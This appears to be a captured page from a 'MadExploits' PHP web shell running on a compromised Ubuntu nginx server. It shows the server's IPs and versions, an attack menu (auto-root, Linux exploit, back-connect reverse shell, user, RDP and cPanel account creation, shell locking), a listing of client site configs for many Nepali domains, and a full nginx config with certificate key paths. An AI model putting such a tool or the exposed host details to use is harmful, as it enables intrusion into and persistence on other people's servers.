Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.159
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
etc /
nginx /
sites-available /
[ HOME SHELL ]
Name
Size
Permission
Action
amatya.biz
1.27
KB
-rw-r--r--
beta.nepalphd.org.np
1.29
KB
-rw-r--r--
beta.rotarymahabouddha.org.np
344
B
-rw-r--r--
crm.sdgases.com.np
1.32
KB
-rw-r--r--
db.drac.com.np
613
B
-rw-r--r--
default
6.25
KB
-rw-r--r--
drac.com.np
889
B
-rw-r--r--
erp.sdgases.com.np
1.34
KB
-rw-r--r--
gandhischool.edu.np
1.46
KB
-rw-r--r--
honeycomb.amatya.biz
1.34
KB
-rw-r--r--
infonepal.net
1.33
KB
-rw-r--r--
krishna.com.np
946
B
-rw-r--r--
leadnepal.org.np
1.44
KB
-rw-r--r--
lgn.org.np
943
B
-rw-r--r--
lmsapi.com
1.37
KB
-rw-r--r--
nepalphd.org
1.29
KB
-rw-r--r--
nepalphd.org.np
1.26
KB
-rw-r--r--
policy.drac
1.09
KB
-rw-r--r--
quiz.meroschool.com
1.56
KB
-rw-r--r--
quiz.meroschool.com-bak
1.19
KB
-rw-r--r--
rotarymahabouddha.org.np
1.47
KB
-rw-r--r--
rotarymahabouddha.org.np-bak
977
B
-rw-r--r--
sdgases.com
1.42
KB
-rw-r--r--
sdgases.com.np
1.43
KB
-rw-r--r--
smartsoft.com.np
911
B
-rw-r--r--
study.drac
1.18
KB
-rw-r--r--
tlmf.org.np
1.41
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : default
## # You should look at the following URL's in order to grasp a solid understanding # of Nginx configuration files in order to fully unleash the power of Nginx. # https://www.nginx.com/resources/wiki/start/ # https://www.nginx.com/resources/wiki/start/topics/tutorials/config_pitfalls/ # https://wiki.debian.org/Nginx/DirectoryStructure # # In most cases, administrators will remove this file from sites-enabled/ and # leave it as reference inside of sites-available where it will continue to be # updated by the nginx packaging team. # # This file will automatically load configuration files provided by other # applications, such as Drupal or Wordpress. These applications will be made # available underneath a path with that package name, such as /drupal8. # # Please see /usr/share/doc/nginx-doc/examples/ for more detailed examples. ## # Default server configuration # server { listen 80 default_server; listen [::]:80 default_server; # SSL configuration # # listen 443 ssl default_server; # listen [::]:443 ssl default_server; # # Note: You should disable gzip for SSL traffic. # See: https://bugs.debian.org/773332 # # Read up on ssl_ciphers to ensure a secure configuration. # See: https://bugs.debian.org/765782 # # Self signed certs generated by the ssl-cert package # Don't use them in a production server! # # include snippets/snakeoil.conf; root /var/www/html/phpmyadmin; # Add index.php to the list if you are using PHP index index.html index.htm index.nginx-debian.html; server_name 128.199.27.159; location / { # First attempt to serve request as file, then # as directory, then fall back to displaying a 404. #try_files $uri $uri/ =404; try_files $uri $uri/ /index.php?$query_string; } # pass PHP scripts to FastCGI server # location ~ \.php$ { include snippets/fastcgi-php.conf; # # # With php-fpm (or other unix sockets): fastcgi_pass unix:/run/php/php8.1-fpm.sock; # # With php-cgi (or other tcp sockets): # fastcgi_pass 127.0.0.1:9000; } # deny access to .htaccess files, if Apache's document root # concurs with nginx's one # location ~ /\.ht { deny all; } } # Virtual Host configuration for example.com # # You can move that to a different file under sites-available/ and symlink that # to sites-enabled/ to enable it. # #server { # listen 80; # listen [::]:80; # # server_name example.com; # # root /var/www/example.com; # index index.html; # # location / { # try_files $uri $uri/ =404; # } #} server { # SSL configuration # # listen 443 ssl default_server; # listen [::]:443 ssl default_server; # # Note: You should disable gzip for SSL traffic. # See: https://bugs.debian.org/773332 # # Read up on ssl_ciphers to ensure a secure configuration. # See: https://bugs.debian.org/765782 # # Self signed certs generated by the ssl-cert package # Don't use them in a production server! # # include snippets/snakeoil.conf; root /var/www/html/phpmyadmin; # Add index.php to the list if you are using PHP index index.html index.htm index.nginx-debian.html; server_name www.amatya.biz amatya.biz; # managed by Certbot location / { # First attempt to serve request as file, then # as directory, then fall back to displaying a 404. #try_files $uri $uri/ =404; try_files $uri $uri/ /index.php?$query_string; } # pass PHP scripts to FastCGI server # location ~ \.php$ { include snippets/fastcgi-php.conf; # # # With php-fpm (or other unix sockets): fastcgi_pass unix:/run/php/php8.1-fpm.sock; # # With php-cgi (or other tcp sockets): # fastcgi_pass 127.0.0.1:9000; } # deny access to .htaccess files, if Apache's document root # concurs with nginx's one # location ~ /\.ht { deny all; } listen [::]:443 ssl ipv6only=on; # managed by Certbot listen 443 ssl; # managed by Certbot ssl_certificate /etc/letsencrypt/live/amatya.biz-0001/fullchain.pem; # managed by Certbot ssl_certificate_key /etc/letsencrypt/live/amatya.biz-0001/privkey.pem; # managed by Certbot include /etc/letsencrypt/options-ssl-nginx.conf; # managed by Certbot ssl_dhparam /etc/letsencrypt/ssl-dhparams.pem; # managed by Certbot } server { if ($host = www.amatya.biz) { return 301 https://$host$request_uri; } # managed by Certbot if ($host = amatya.biz) { return 301 https://$host$request_uri; } # managed by Certbot listen 80 ; listen [::]:80 ; server_name www.amatya.biz amatya.biz; return 404; # managed by Certbot } server { # SSL configuration # # listen 443 ssl default_server; # listen [::]:443 ssl default_server; # # Note: You should disable gzip for SSL traffic. # See: https://bugs.debian.org/773332 # # Read up on ssl_ciphers to ensure a secure configuration. # See: https://bugs.debian.org/765782 # # Self signed certs generated by the ssl-cert package # Don't use them in a production server! # # include snippets/snakeoil.conf; root /var/www/html/phpmyadmin; # Add index.php to the list if you are using PHP index index.html index.htm index.nginx-debian.html; server_name honeycomb.amatya.biz; # managed by Certbot location / { # First attempt to serve request as file, then # as directory, then fall back to displaying a 404. #try_files $uri $uri/ =404; try_files $uri $uri/ /index.php?$query_string; } # pass PHP scripts to FastCGI server # location ~ \.php$ { include snippets/fastcgi-php.conf; # # # With php-fpm (or other unix sockets): fastcgi_pass unix:/run/php/php8.1-fpm.sock; # # With php-cgi (or other tcp sockets): # fastcgi_pass 127.0.0.1:9000; } # deny access to .htaccess files, if Apache's document root # concurs with nginx's one # location ~ /\.ht { deny all; } listen [::]:443 ssl; # managed by Certbot listen 443 ssl; # managed by Certbot ssl_certificate /etc/letsencrypt/live/honeycomb.amatya.biz/fullchain.pem; # managed by Certbot ssl_certificate_key /etc/letsencrypt/live/honeycomb.amatya.biz/privkey.pem; # managed by Certbot include /etc/letsencrypt/options-ssl-nginx.conf; # managed by Certbot ssl_dhparam /etc/letsencrypt/ssl-dhparams.pem; # managed by Certbot } server { if ($host = honeycomb.amatya.biz) { return 301 https://$host$request_uri; } # managed by Certbot listen 80 ; listen [::]:80 ; server_name honeycomb.amatya.biz; return 404; # managed by Certbot }
Close